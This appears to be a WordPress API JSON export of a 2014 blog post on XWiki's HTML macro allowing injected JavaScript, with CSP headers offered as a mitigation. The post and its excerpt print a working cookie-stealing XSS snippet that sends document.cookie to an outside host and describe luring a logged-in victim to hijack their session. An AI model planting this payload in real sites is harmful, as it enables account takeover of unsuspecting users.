{"id":2383,"date":"2014-11-01T17:43:07","date_gmt":"2014-11-01T16:43:07","guid":{"rendered":"http:\/\/kudzia.eu\/b\/?p=2383"},"modified":"2014-11-03T09:04:07","modified_gmt":"2014-11-03T08:04:07","slug":"xwiki-html-macro-tag-and-unwanted-javascript","status":"publish","type":"post","link":"https:\/\/kudzia.eu\/b\/2014\/11\/xwiki-html-macro-tag-and-unwanted-javascript\/","title":{"rendered":"xwiki, html macro tag and unwanted javascript"},"content":{"rendered":"

xwiki<\/a> – by default – allows contributors to embed arbitrary html, including javascript. it does not take much effort to include something like:<\/p>\n

\r\n{{html}}\r\n<script>\r\ndocument.write("<img src='https:\/\/kudzia.eu\/?"+document.cookie+"&"+ (new Date().getTime())+"' \/>");\r\n<\/script>\r\n{{\/html}}\r\n<\/pre>\n
then you just need to lure your victim into visiting given wiki page while being logged – you’ll get a http request containing that person’s cookie that can be re-used to impersonate her or him.<\/p>\n
it seems that disabling the html macro is not a good idea<\/a>. Content Security Policy<\/a> is the best bandied that i’ve found. i’ve modified the definition of reverse proxy i’m using in front of xwiki to include:<\/p>\n
\r\nHeader set Content-Security-Policy  "default-src 'unsafe-inline' 'unsafe-eval' 'self' some.server.with.trusted.content "\r\nHeader set X-Content-Security-Policy  "sandbox default-src 'unsafe-inline' 'unsafe-eval' 'self' some.server.with.trusted.content "\r\nHeader set X-Webkit-CSP "default-src 'unsafe-inline' 'unsafe-eval' 'self' some.server.with.trusted.content "\r\n<\/pre>\n
and i feel somewhat better about myself – i can still use iframes showing content from some.server.with.trusted.content, injected javascript still works but it fails to communicate with not-trusted hosts. it probably can still be exploited but that’s better than nothing.<\/p>\n
unfortunately this change makes LiveTables<\/a> unusable under IE.<\/p>\n","protected":false},"excerpt":{"rendered":"
xwiki – by default – allows contributors to embed arbitrary html, including javascript. it does not take much effort to include something like: {{html}} <script> document.write("<img src=’https:\/\/kudzia.eu\/?"+document.cookie+"&"+ (new Date().getTime())+"’ \/>"); <\/script> {{\/html}} then you just need to lure your victim into visiting given wiki page while being logged – you’ll get a http request containing […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[17,51],"tags":[86],"class_list":["post-2383","post","type-post","status-publish","format-standard","hentry","category-tech","category-unimportant","tag-xwiki"],"_links":{"self":[{"href":"https:\/\/kudzia.eu\/b\/wp-json\/wp\/v2\/posts\/2383","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kudzia.eu\/b\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kudzia.eu\/b\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kudzia.eu\/b\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/kudzia.eu\/b\/wp-json\/wp\/v2\/comments?post=2383"}],"version-history":[{"count":5,"href":"https:\/\/kudzia.eu\/b\/wp-json\/wp\/v2\/posts\/2383\/revisions"}],"predecessor-version":[{"id":2388,"href":"https:\/\/kudzia.eu\/b\/wp-json\/wp\/v2\/posts\/2383\/revisions\/2388"}],"wp:attachment":[{"href":"https:\/\/kudzia.eu\/b\/wp-json\/wp\/v2\/media?parent=2383"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kudzia.eu\/b\/wp-json\/wp\/v2\/categories?post=2383"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kudzia.eu\/b\/wp-json\/wp\/v2\/tags?post=2383"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}